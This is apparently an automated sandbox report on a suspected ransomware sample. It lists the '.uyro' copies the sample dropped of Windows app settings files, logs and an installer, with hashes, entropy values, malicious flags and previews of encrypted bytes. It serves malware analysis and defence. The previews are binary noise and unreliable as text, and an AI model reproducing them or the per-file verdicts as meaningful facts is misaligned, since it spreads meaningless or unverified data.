Preview:	regf....Q).w..M.4..e.........n...2...V..u\|.tI.`..V...#.^.?flu......(...j..Q..v.II...a.x.....i.K(r....G`..,..r.j5..0"2.L.d6b.H.ql.T.9.....Y...M.........Ti"Xr,D^.X..Ji>Y.....s].lW=.>ySO.W.........?...J9.@..4.x?.$S.....o..Pk+.....d..X.....}.~..~......l.......^.H.Vg.......K...P.......w...8.=~.^..k....X;.I..z...E....T.[..(......q..3.Mv?S.x.=.'..V?7.._d...u}..1..\...]....7.g...;........4...Q..]..B%.?..<.<.-.G.[....PR.d..$4..>QS,.A..,..o.17.o.._.:..+L..UNo}S..kZo1V.^......>.......b..&.......A..m&....A[.DM...0...Y^.%.q^..L.r..bNN..]E.}.O...ZE.f....?p.F......4&/\o...........tbh....8.w...3.a...l....J....)..+.g).A...(..3...j..WL:.xNA....zb....y...n.c.;..3r.....m+.^..v{.....5..r....W<.........v....H...W../.I...a.....^....g..A......M."/..EC4P.j..\....S#.%.Y.&.@.'..:.....L(h..E.F...;?...U4..UV0..2}.H1...X'.....P,\...r..t....?r<H.....Q.....F.........#..3.R.y..g".k.< {.....DH.1.Y..i.l...Y.v...Q..u..D.p.\|.M.....L8..@....s. ..lD.....uT....r.Sc...X..6D." .

C:\Users\user\Local Settings\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978530030793618
Encrypted:	false
SSDEEP:	96:i5CQgwxUKAHAXPTt1guYI59MOZ/7g5s/zzIXmikKFOy3Wn/VWM3LPRBFvRGSOUr4:qlxvaAXxrYg9di5s4/03toSOUEuwvNDt
MD5:	D6226FC8C426612AE32D6F59EB2CB0DA
SHA1:	BD33E90817D8307B376A884F3A149A8ECADAB142
SHA-256:	68C975A967F36F22025EA6293F451660B378B033C53CAADA3FDC08606C7E8BE6
SHA-512:	60AD0FF63F10A677FCA8BA3EF79B5CAE4FADD89FCAB88B3E14FE110C6A2FEA700F2A4150208038FB3D445793935E450CC7DEEC3AA53DEBD38811BFDBF3EC82C7
Malicious:	false
Reputation:	unknown
Preview:	regf.......a.L.O.u..-..Q.4.@....w....(_g9...:.3.....j>o7.i4..<.<.3.q3..MK4..a.~.....R....m.j.\/.......F....P......../..6Q.F..T...=....:..z..6c.....U...E..'.w..J...\|I.5-Iy7N..a#8.......k..v......\|%5(e.y..AU..T.)!...36N...1x=.Z...h\.w0.#..&.U4.x.k....L.(JQ.B.../........i]D,.&.eo.&.}.t.O.7...3..sEI.<. .`La]..1--[a.......s....K..G.3.e..........\|d.g.#.[.l^..].>......._...I.)fW.2..9W"......P..P.!.0..`Z_.^N.&..y..i.L....&...5B...W._...n'.JpqtW.J.V.._GA{Q~.awFKFL,.@"18R.c...e!4.g.......W.p.V?..../.[G..uJ+G.`4........h.=H}..2].B^l.nxP....RN6..:Ly.%.9...,.\|...U..ny......S.8......TB..1%.x.......O.K..+O.....d.+.U.F.}.......S.>...{GC..L....._..x...y..g^d..e.a..4&U.7.+`..ITV.7:[..%.:W.`.........q...z..-..c.. .Z.....kr{0XRl.P,,.Q...)X.M.}..iM&.V%....F.t.]R.L.....\it&.A...o........g..........3..H.....y.^F@..0_..Q./.....jBk..yv\|....p}.y...D4Q..p..p.........h..DK..+5!+.$.....k ..t.."O...t..8...=Y.....\|.P.V_4..0.paR..s.1..`.5/8..)x..z..O..<.C..6.

C:\Users\user\Local Settings\Packages\Microsoft.ZuneVideo_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979222428434112
Encrypted:	false
SSDEEP:	192:oXAnhUba3usflkhYbb5U33L8CHDbd1prdleQiBAH0LxneIfrc1:uAnh8huuaGpl1V7/vH8eeo1
MD5:	6907A719A1CE7F5163C467E15A4C7F56
SHA1:	C9827B8376E6504A6D27911F20040F5A86A87BBC
SHA-256:	3BB90C3D93BF10F7906894E0E7E5D7E9DF4A23ACBAB70D1F13417C6357F38FEB
SHA-512:	487920E1B9C8EA09E27790F8E87D8C1756C25633CF86AF9E6698208EAC31B77055CB1C792459A4728173409B37DFC3BB1A5E9AEF9C5D7E818ABA9739F5040957
Malicious:	false
Reputation:	unknown
Preview:	regf.....t.....x.Nsbqb...k.....s]....._...........6H...Lf...G...G...e......W$<......#5.#...J....c.k.@?.!..7z.f.}!..f..[Qc..O..1.....O...D"..n.h...6.v.ob._..k.{d.L...0..1..\|.....a....._iK0.z .v.3....>.'..L.kM2L........TT..=m...\N{;&.h.y..WA.........O..x...&..X.QAF._X.a.H.AO.jb..=s........".........U...?.t....@D....E.V....qZ..@jfh.e.N....A.\|...4,..8J.z,.N..O..T.X..%....be.Y.G ......R...5i.O...`..........j.C..;.'N.!lT.R.;..S.z.v.....''5..N8a....!...A<?..O.......N....q...=m..Y...-@.(..w.\|.5.E.c.+.........C..,...X..W...8T..$.{....&1.!...i...=...hRCJ(..Nn..;.S/....P...H.aY...\KR..=.%-....\S..W..;$B..9...l.u..&.R.7Q..\|.-O.N.O....V...0+..j...B....@9.s.7...,.K..]H9.O...X`kd....P...K.....k4..1.M..=.~..[..P...b./...'T.M.i.+.u..c......QCS...?/...:...... ..J<.....Pn.4.(-.S..f..^...% ....I..4.Y..8c...b...p6..%....V?....K..'.#.$...O.7\....+.....}.\|).Nd....b.....cHJ4b..=.}...5......wI""3.1\|...?6.L...G^...s....-B..p.r.x...H..};!c.sM.g."*...Jo..{...Bg.{

C:\Users\user\Local Settings\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.97847450323752
Encrypted:	false
SSDEEP:	192:e61lVeaXXtTDM8h4m+VaShYhKhJW5UAyGPHVSSmR8CGSJYOT7O6hn3u4AFE8vFNE:euTeaXXtTDMRmXIIK/W5xyGfVk3GSJrt
MD5:	41A71A603F636E3CDC578FD8197C30CB
SHA1:	3A4CD71632CEA6CAA09BB2CDEED7FB626072EE1D
SHA-256:	87CC7199A2769AA0F17E520056F19866FCCA9C1234C8F365705E186E34C603D2
SHA-512:	FC44FCF259648FAEE3B4C5FF276B14FEC53D983172897AAD7D3B7F42A845DF5A590D59718FECCA2A867A60754B6AD8783B096570A8AF9F2722CC3902063C4AB5
Malicious:	false
Reputation:	unknown
Preview:	regf.R.......`.`\|}.EntMB.NZz.&n.E.[...U.H.......d.`.[...0E:......uF...2O.H..\|-...o......T....b.)z.1.M.;\.............7....,.m.....C..Q.&5..5..[.']...6.@.c.....4...}...;....(%..\|...cY..[..c.&u.D.}e......S...R.-.t.N...].(..r...{2....l.ZJ..~V..4.h..U...z.m..^.q.~..p!....M.#.I~..K./c1=<...1FzT?.u...v...~N..}..}0.N.eK._h&i#"!....w..i3r+6..ak.)X8....8..ii._..\|...t..V......_.&...y.O..O.<....,v...@...5......h..<V........A.lI.3..}.dp....?.j.Q.-.........e.y$.....j?.0.Xi/h.$.X..4....v.....%4N5>t..........&t...Ozk.r.3..R..+....'.Y....jKF...I.E.Y....t..........7..sl*dP....\|.<I.R}..DFd[.O..y..>..G........._U$. .E...&...)@-?3l.%y..N6F.u....oKC^.......Z.#MA.".:h....V....&.r....v.dP..{.aL.4....E:.`;.I....4DK....."eMs..0.FZT.....F-\.-.b.....?....b..,..1u..32.....\/..D..W;.3...0.Y.D.C.=O...b.$...}.V...yW?.N"T..D{.C..I.Hs..`7'!.+N.......!."tr7...........3..<........+......7^=+.H4......._Tv.4J..I4.."a."..7.t.\.}.'.#>(.7.23.....e./..e;.m.B.r.p.P.t.?u.^....

C:\Users\user\Local Settings\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.974835813437781
Encrypted:	false
SSDEEP:	192:vjbQwoeJeep2TiASbvn8v9TFIZdMc0V1+7kJiLZHx7Y35lNdVeQIcaz:vlRSTFyO9bV1piLxW3bNibz
MD5:	EAA57B78CD1EB9C52518A032C6536005
SHA1:	0087224D5F459D44C3422A5E4A4B68EF7DD25C8A
SHA-256:	335E34928BA330BA952B357FE387DFC5E347D3350D41F880AD8C438B3AD22D9E
SHA-512:	6E2438FD36280A81BCCDB6176E44D7EE28F09551D857D46114BBC11E49619B4017EFBA60693DD5A12B8DE190D6EE999999DF58C672469A4C8800E282CCE35BD2
Malicious:	false
Reputation:	unknown
Preview:	regf...B.Q_..:y.}..Ld_....`mu$8..Y.......uAfu.mL.<..[..Dd._.1.......a>f...r..'......{....1K.v'.'.~\|....{.Bi..rs.......j...lQ....\.._....+_>...,...G....u/.a.{].H..V.......~.W.z..z...E.`......s..... &.v.E9t\|..v.....L.D..2.kQ..>..[.g.r...'a..I....<O.m....Q....?0....X.'.].$......T+...@9.2Kw.C...q8.....I....60x$!....4.2Q.....U..Q.$.j.....8}.............X_........M1.)?^..........].Ea...p;....c.....mny_.K....$6..].r:....."o..<.h.cGtg.6.B...U...4eJ.S..:?.J.&.....m..^...B.,QA..$....J.w%.kL....&....J>.N.ET...Z>. ~.".!T.B%}q.?.i..._n......:..x.:...B$$.X........n~6....K.&T.]!XP.[*B...{.M"7.5_.i.}.A3LhXZ....fG...d..tM..........UJ....X....5.W....(.....e.9.Clxqt...B`.....GR<...g.E.m..5....[...Z3...P..2..(.%...`......{,K..AS..j...AY..G..j..A...jy.F.{....c.../C.5k..pAd.....i.;..M5.{.......g.C...e........ne....Kf.....H.\|.....{..O.M.n.V..9v.........V.o.&(&..D...&.A...A........#.V+!3!-!O.c>\|@.Ap"..J..S.z......=........m...m.....?6'..v..`L...\|5.o.J.I.T..

C:\Users\user\Local Settings\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978221097808172
Encrypted:	false
SSDEEP:	192:V86Na/BVp7+s3pmHEeFYZB633LcinEZx76y2jMDUPHraxQTsb:xyVp7+44/pnEH5DoUQM
MD5:	FC4C783463633CA9F6084C7BD97E5995
SHA1:	3593BABEDD72BA9DA3635A92143A31D7BB3F1AD8
SHA-256:	A0F05441237367E258B4DFFF2DCAAC0BD363F30336F878BE27FAC388C7764AA7
SHA-512:	9AA629FDF69E35647B2E87E359DFD9C3C725DB82CFF4B52928902E9B60F0B46E0EFCD56C72D8E1CF9929D1416A8A8F43AE8B20493CE66ECD9720CDD3E4EC6DAE
Malicious:	false
Reputation:	unknown
Preview:	regf.2...1^h.....<..(P^.A....j......X..DJ.^Y.Y....c.8....yz..@P..}..@]y..g..HN...%..]N..I.:.JY....h.Y....Vq....&..HP.P.e.I..t...y.g...(M#....i..J.D$0.j.d....-..\|ot.A5'z.(>n.p.}...^O.A....T.............b..(....T]D'...?....ej.....;.f.~VB.6..b.......#.}\.D..\...M.+..qH.`x.._..cP..:...PQH...a.N.]N.;...nl."}#1'.....!........I\|d"`..u.....\|.1....)n....T.......,:.=.\|.c.^:Q.P....\C.q.c...........x...Ok.7..c...x/y.h..{.\|w.f........6,_}m./x)f<.Z...ISi...?.+l.......g.....dh.A.vc9.:R.....{.....l....u5d.M..U...~...... ......n..~bA.%?.0/.bB.+...R..bT160..\.F.....<...U.CR............q.&d.....4`I..J'.9:.nf..%....:.S...k.....O$..g/....v.W..bV...U....QW'..>g..h.u..OR.JS..Xr... .b..l....v..X.,/..0.Iu/6:..=.'..k..^)j.}.y..{.&.6c.....a...?....O...3..R............)W^... W...H(...fAPT.L.....f..y...6..R...;......W.V.FA....f.O.....2..f....p........*.`.."...r...]\.......oh.`.P_...ff\.T..._..s,n....S...%,..@P..<.?....1........Z..G.7.....":\|.....\|..v7.S

C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65870
Entropy (8bit):	7.997386421675592
Encrypted:	true
SSDEEP:	1536:wvDbJniPfaSnF49l/PbQBMrYT+MZAlzc/BkNmXXEbdzJ:wvDNu1FUBi+QAlzqBkNfb
MD5:	A808B01C3F14773197BC1530DF1EA420
SHA1:	E71DFA3FE644D74CD838FE6777F408DF84584E67
SHA-256:	2996A068B5CBE18024A1AE9318D6D39B3D9894558EDA619B907507BAA0E9FAFA
SHA-512:	5AF5A16266907C89F20F5EC6F17496F50BFA1DA6EA0B74A1FE1961C82F9B9DA79C5E695C1518DD81B2E9A9C5A1E69F6408BB141CE9543BF7E27EB14FD7DFFDB3
Malicious:	true
Reputation:	unknown
Preview:	.....u.....n.[...Wc......8.=.;=......i0L.Yu.c......o<...5Vkr..A.]g..]u....o.y`...X..........-H..............N..Op..<..}A'M$><...i.S..........Q..y.~...o-.W.o'.lf..O.c.......R...d)..@c..;...?-I.p.g.......@4o...t...e..1^.w.S.Q....zhv_../.=.'....X..p..v.ul.e..<......M..d....<.......HDMr.1.q.c...j........x...{..../....7].......Jq.uG<........."sR...wq. 5.Hs.r......F...#....a......}........&..#._.<.y;F...{.(........UYs..d...H@.v.x.y%..}.....o....5:..{."_..9.....='.\i_.3!..#.=[......x.[vq!..I)...u.Z.R.a".....)u....[..E.K.@I..._%.6.._..M.a..e+d.!..z?.{........V...w{.!c.....7.m`...q..@.'...Ln.O.P?f.c..%...o..wR).....x..2@..!.'..!.M..2S.WZ.>u.[...X......e..,.CJs.2.}.-v...\.w.#6m#2_...{6.........F.1\j.x...uI?.<..._......8M.s%..e..M..H..."4./.V.).tFI.....h...=1.....M?...=............E..W....<2...A.Fv)...r.0..\7$R..~Ze,....z.....Y1....^Mx..sM?Gw.(..-.6m*..K.)_.\Y&.sDT#..K....7.........C=..ve....!.p19...r.=s:./...!...BE..J.Q..-...q.......

C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	65870
Entropy (8bit):	7.99703999482378
Encrypted:	true
SSDEEP:	1536:qsWjNBAbsR60AxCWNMx4b+xFjEO69d6XnV9xKrlRueDDni1th:yNBAbsR60AxnNSx2O69d6XnV9kLfDDns
MD5:	B9B142C81E342B3C786E402E5ADF461A
SHA1:	D00B53096854391EFF970FC6A1619215D5F17A24
SHA-256:	A1C3726F5E9AF5410BD54A0DDDF1465141F2834436CACFB7396AA6E3C24BDAEE
SHA-512:	3817796F1D1A706DA8F0D79395277EE32836A3E5B28AC2D7E1304B64F2B59C6EB22738D4482E115768A55806479C7C458997EAD2A3309F50071DFAABE868B41C
Malicious:	true
Reputation:	unknown
Preview:	.....r....f..F.\......c.lU5j!=U.?..e..........&...f7.......Dps..z...)...T9....6j...E...0.X...g.h..f/..B..!U.L....@H..!....$..`..`ej.Z`?."F...bn.<&..U&..d......6..............J.t...U(...s...:.U"d.e..D.k...Y.Q'.......@..J...4........l......1.cW.9..;.\|t.#O..pT(.0.}j%..;j.....d.K!..f.d.......q..bz......).S......_..A...w...S.......c..D5gt...}..5.NtU.8(.."....n.L.l.sN.......y.ntm....M!....{/.. I7.#]..$\|B.....Lq.j....eE..vb{..{..D(.c.......l.`"...w42.>...u'....'..?y..%c..R...2.C..z.f.Y.!U6....].{L...1f.l.=..R49....0.v..\...X.54\|...C..t.z...N..dt.H.}.qR.F.y.(Q\.a....1f4.DR5.......k...3D..}L......~"$.....>.w....b.HA.W..r...).7.....S.'+...T.._.nGw$...$..m...v...9 ..Hp.X.#...Kvr.......B..^.}..............m.C.'..cBXZ...].p...EZK"zQ.X.YW+...U.cC..pPe).H.....e+.E%.l.`..rb......>..`UZ9.&.t...$p.C.n.V.Q)z5b...mw+S...7.bS...Z8....2d....=.9.E/.0..d....Y.H[.......6=.Y.G.n.....wu....W./.l@......B..c"Y..Bj.....!.....P......-......;I.d.y...C.9?..o#...p>...T

C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxStore.hxd.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4194638
Entropy (8bit):	0.8519585694447254
Encrypted:	false
SSDEEP:	6144:sDrkQNu0N4YsymKPlSxRNp8/UMRT00TSuEbU:sDrPNu0qYsymTRiO0V
MD5:	787FC419A3408A6D11A6D8F81C642001
SHA1:	FB978EDAEBD1383139EC988DF670871B7537FEEC
SHA-256:	3318FC1BDF59CF91B39C448F70F26B87503BBFB8B7F87C84C908FE7811635C76
SHA-512:	79825855E1E11158D767C3688AB4F4FD444FF71192886B5E407EB4B67D73C2D72595FDC5B6EA86EC5CF87BDE82AFE1DDABF7F9F8CC90A03AC68E0BD02C3910E9
Malicious:	false
Reputation:	unknown
Preview:	Nostr.pR[...>....._.^RX.6d.>...GE#rc,......^.`..z..<....~.'Gqo.N.m1H.+X..d....~...e\|..I2.Gr8/"^L.~!JtK...?..q.(....-...^(.=.....0?.....R..Q..M......~.....D....%..w......i2.C...N$..tc.H...R...dd.2..Ef.ZL.w,...}....8....d\h'....`...T.@\.tXVA`$.K..q.^O...Yt\|.FH$gz.....z. .B\RZ....2.s...(#.y./..!...Q...9'V..t...x... .'c....Q\.Y..^i........M....bE.p^5..).#.....,_...8qD.J.....y..g..w.K..../.pI.....I.s.-.......e......W'..0T../'.<$....1#......).......u?N...+.%@..2{.vp,!..b)yx...&...}5^.a%A#W....-..&..z.`..^.@.m.9U.s......0\=.:....Gg`xc..: ......aAW.R.....2...r..P.5...#.#..F..s.v;.......l..8..U.A.E..G/u.~r..p.\|..m?3Crt....q..1...AQ..m..2.Y..e:...m..[.Q..,..W..t...."p......d...v.7i..-.v.f..F.IQ.Vtb.9.i.....>Z..-.......2.....6..v._....+.q..B.G..\......6...*..T,..k.J;..#^]~1.P... 2...L..p)...j.M.#..,CL...0.#.t....g...%.`....[>f.....H..\|4e....0.W@.....+,w.$T.I...e..!..S...%_..../..TT.+u.....C0..J!......>x.B.~R...f.....V......dh...\.]]...4]rT..}..

C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	33102
Entropy (8bit):	7.99501738601158
Encrypted:	true
SSDEEP:	768:Fg9P9B3athsjC074sfzXCUGpvQcn85g8+Hf01j0//:e9P9B3aXN07nGQc++Hfh3
MD5:	FF9B78DF287260FD88984F4DF43E18BD
SHA1:	A22FC158095A567861E90A3FDA049C9699C4CD96
SHA-256:	3F5F09005891702FAEFA53AFDA80D57B675E5AEA6C32FBCD61A1B8CE33CED946
SHA-512:	F99DAEA2ED5F4101D4954218A0B74CBC2BA7F6222E24EE24BCF1B0544F6F664650144B7E6D86760F430623AF99BB814B94A4E1E4E7E5FF4EF00D4D57E8C0A1C9
Malicious:	true
Reputation:	unknown
Preview:	regf...,...0<.&3........S._....3.G{Y...@...~].\|7.z80...i._.W....br.Z...=..\....C.KBh......h...U."...c.(..KF\|+%.9r#t..cB...K\|...5..U.AJo....c0.......).'.=..4........h5..r0.w..k...7%i..T...:...a..x..i..2....@tC...R....H..._K.....F..^.b...H..3........8.(Sl....]....X..\|.......Ip..6..%.....'.E......Mn%zo.kx_...GDW.%Y4...m.e^yN.....A..IT"...\|a..I.AWu.......V.<.YL5 ...@..$..V..0.]......K=...`.)..U......pgqIH?#BW..n`.^ge...q..r...>....F/....Q.Q.w..-..H..._\..K.T-K.O.....Bp..Q..6....\y...M....hh..m...P.zH{.../.~..... ...k.W...j,.;...;Z`.Ej..`.... ...?.."y...F8.K.).Cd.b..<..&N........5.D@....^.=..T.q.?)rP..4.Qz;....9m...U.a....f&..y;...w......w..Rs..#..}.OA..Y....!.<n.0:.1[.L..D&....;.@...cS..A..A.._....a;=..9.3..........BdV....4!.tvlE.V..p...\|..D...p...).A>%..x.\....3....i.0.K.i1.,.-.....O.....P....0.'E@.+..kY../.0...S.....#.._].?=..\|.9..zKyi2VilfY.of[b.....X......A.reU.:..._...$>:.......G:l.rS...E.H......%N.8t?..F0h.Q......=.{...'...?.1I^.

C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.9889432458291205
Encrypted:	false
SSDEEP:	384:Gmx9O3HgfrX1/egE7ExgmT8nyANcleHuWjg5a:GmmgzlWgE7ygmT8yAOwHup5a
MD5:	8A5BD599CA036B2108CEBD457F21C5B9
SHA1:	BF4933E5E46C41FCCEDD120D66DA33449D5554AE
SHA-256:	7989D9DFE3EB180AA86CD51169C6095824B5B8FE00CB7E7208D788EC6CCD4230
SHA-512:	EB90D58724D2814A208117E75B04BCCB6C92AF18BC98015C42625D469C3A3124F92958443CA3781CFE8DA215697757A0FBDEA396D7D3BE55DEDA97CEE5B3C605
Malicious:	false
Reputation:	unknown
Preview:	regf...;7....Q.Z....jh.N./b..b.V.=.....G.....h....t....(.?7...Y..}I&.. 9t=......MF..R.0.u..I....%B..a..Y.....b..h.i...s$._.d...@...1.q\|q....zr~i..."..Wz.K.P:}..;...hd..k.,..B.[.B.[....+fD....../z8%.sw:fXB...Eb$.H.tT.....]....#..u[r.(W.+.h.w...\.:.i~..U#d..0..o..7..?=..E...{[...F..\...QR....J....1KHCN+5E&.q0r......Y$.n..V.).)....Y..... ....~p..ubkeX'...8...j.~mhe.J...W.#....X..1..A...ov....U..x.iva..g....._......t..U.....&`.!*..C@`.i.=.....t..H)1.z.?.....E......=E.......&...1...T... .U4...7X.F.U.....((o.P....HI.ib.(j..f..c...0..7...1}..4..\|........ks..}.j%...(@.E.=..q7..a..=G.._.r..%..4..G...g........8....<.z.4..[.v2.7..`....}O.>..u..yC,....6Et.s)tk..lk..X(.MA........9@.m.q.s....Y...^.H4&..l+..^....p.~-..\...n...J...[..... ...5._....v......^."......W.w.w.b9Ub...Y.q.24...\n.......i.....C ...m..~g.&.R..oe...n....1~\|.0..d.y..@........_nr5F.O/....JL.>\...-,...yo.........>.....;..\|.m....#..;.F.O.v....{.2..;..Z.4.k$..=9k.....It.....P..(~/

C:\Users\user\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978923005542611
Encrypted:	false
SSDEEP:	192:j5geh0moa9HhgFatuaWOGNav3XENPX6ibPDmXgORs9+:FFtoBcuabGNavSPKCmJRs9+
MD5:	1FE78878E8DD85205FB0E8A90EF6F30F
SHA1:	92F2DBDD7323E863B127F08A0023B067527DB252
SHA-256:	A280AC8114833C2911538A794F37BF0F0809EE2600BA6E4674433A966107BFAE
SHA-512:	C74CF6D8CD0EE9BF4A1EE2B75D5AED5D40F9872476F3E1BD0471AC2DD1D51F7A331B0017F9BF63EE29A805E631A78E2D2B28863A60468D43DC41C1A90A17E642
Malicious:	false
Reputation:	unknown
Preview:	regf...ba...).L.)..X.US......D" }.<..X..d0..J.....N...s-....t....}.Y.{...Ff.`...\I...J...m..8W..).K..4..H\...%..L..........h}W...\|....1...(.\|.D.....@...{....X.B}.r.g.....f.0z.D.!......+C/bm....8..=............v.Kh.VO<...~n. ...In....q..nce.....1R............@.bt.:..........Pt`!86.(s._.d<.i>.t.{...}..WZ~.NTy...b&.d....dk~....=...4.......iz..2..Jjk...l!+.d(...&.Z.>.....MFaa....)"Ji.J......FK.2.=....W.y.V..E..\.$S.);....d.g..Q... [\|....iOD8S#.r..=.....^._/.`.........KJ.].~.....A....#..B...&.;%I.....wL....v...\7fC!.Om&NyaC..ph.B....5......S...z...).\|...5.\.x.F.q..C.J...N...QQ9mHt..Uc......0.8..{.[....oI..4._.w9&....:..#b7.)...e:i...^...<..m...b.....`.z.:.j...8.....q..k..Gu'3d.[..ft.BQ./S...!..MK...by...*1.!....I...N..(.....8.....[.TN...0....uOKW.5.4......W7...YAl.......T!cW.b...Zw.. ~+..U...e.M....9.E.]#..:b;...YE..7.....S.8.vJ.6.]R.r..7...f~...Ci...M.S..c.&.q...p_.."~.(......`e.....?...o.9.zv..v.....?.J.4....F..c..Z...x.@..=F...2...?..3.#.V

C:\Users\user\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.97917337982561
Encrypted:	false
SSDEEP:	192:P703CI1djAnnZhjIU7L45gV1nKoxHXUf/hQABPrIgH1yk:g3VdjAnHkU/4GV1nKox3U3hdBJH8k
MD5:	F1EFBCE453D52724D146C3B537B1437B
SHA1:	33306ACC14A29798825A370B90443FF067519BD0
SHA-256:	F3FC7BCDAC88FCBA22F87A69BC248A9DA804C0E9B68CBBF3069C10296D6F46D8
SHA-512:	E40DF79258BC83D1D3F24ABB450FAF763DB7A50FA72354E2276CB8C322E802DA8887CEC5BB53DC1033198DA686D298B994D13D2BF726F9B5757ACF20067110CD
Malicious:	false
Reputation:	unknown
Preview:	regf...3.~\|......X..../..K5~AC...>C....~..&...O.....v../..^}.I`...Ed5.........]9..>.Zy......d.9.'.C.f.].fZ.cEF.a....N..<.{.........N...w...uf..W@"..S....t..........!.<.8v'fW.g....[n.P.1Y.s.+.Ja.U.U..........!.....K.. .9.&.../pto.W.I\|..A.....'.7&....u.;\|./V.^....Eb..C.....$.%3...... ]c.....Y.@............v...Th...~R....n.i...#.9uH......C1..r...i...\.t............J..$`..._[...nlr.j.....Oz4....p..G$.S..m../......i..U.c.xz3o....o.a.9.........d.....J.b...N>.^f.^..@bQ..^.2.q.j!...~...F3.c....s..,......_.L.B.~=5.v.w.J5S..}....W..4..n...e..6\C.K.........1H......ku.....`..P.q..G..9.W..x.._..\|...o.....P...N9.}j<.n..A<.#.pJ/ ..QXh{...<...{M...x.upy\|.%`...Z.....<.G......t+_. .....2...v..p........cY..a.......z.........}....R.%.G.... ...OY..$3...:I..y........!........y.i..]%....v.a'.F.;.q...^..-m./.:$..7f.6+p..\.6..z.....S&'..;.3.....o)=......^5..J..".4... .....Np%..}.2..E.....i.Ou..B...^t.a.......@K/.....4...~.rJ..c..@.D..8@...5../........Hd.X...

C:\Users\user\Local Settings\Temp\AdobeARM.log.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5108
Entropy (8bit):	7.956563378801129
Encrypted:	false
SSDEEP:	96:oZo608iHpa5522XNxpIJ4nSkOlxRHwbU7Z9rRD10gleIynlFzXGRn4bF/Vkn2R:S08iaZXi4MlrQbuld3yFFCW
MD5:	D6306B72BA984FC5FAA7CA7E4F462BCE
SHA1:	1B54BB63346C3D43010BEF4F0643863CF3E950CD
SHA-256:	DD925160419C50E0BD341387DBEE13E150C129F52680E26E6373C818B7773B70
SHA-512:	44ED23D6ECCABEDCB65ECBB407221B31BFE410AA7FE30155B644F13506AEF1D1B92FE8DDFB1BB1253A7D9AD9810C41EE97D7BC68DBF4A539BFE8B2581CDCDB3A
Malicious:	false
Reputation:	unknown
Preview:	[2020a.L. .>?.7....<8..K..J...b..6U...J..I.@.....T..S.kNy.d.q...ld.}...p...\|v..;.gin.g.....`...@i..........\fiH.....He.g%....Hh......W..W.&nr0....d..V....S...uFX..nD.C.....K?.r....]....K..M.....!.#.A.+.. .....cX.by.j.I.J..C....n..~y..:l.Ru..$I$......I...3.g....s..f.4.8l%.....@.v1t.A...3jl.../...u}..0a.#.J.h\.{.....n.#./.J. V.Nr...%..8gP..>........?.....gj...k.h>.%j..5.;...........R.6d.fz...{.3........R..k2r.~x...j.D.n..]...y..}N.....S.........V]B-..du......\|.:......o..%.&vS..V:....`\|..a.., .Bj.?.?...%...;........k...6....Dpr..}h.I..2n....!+...7'...c....t.L.F.......a./Zw\|....E.G.n..ZS....Z.....X...u.%...J.(..=[..9.z........=d~h.x..zu`q....)c.Z.yL^..F.h6.b,..Z.9.0.J.{.P.9..\|l.-..8..o)I..6Q.EK.l...B.Oz....B...@..F;1b%H..Kza.X6f..B.R..'q)......[C-]B\......H.u.....F..:...1..\|a.......7tV..\.....?...)..q.l.gt_R.......k.M'b.S.}..U,.}.<A....I.......F...!..Ec...>a.T..2.L..fis.ki.!.l...f.^tA=X.g.z....G..ap.ap..?.33....S.9.J.;..A.C@c...E.$...

C:\Users\user\Local Settings\Temp\CR_4BAC1.tmp\setup.exe.uyro (copy)

Download File

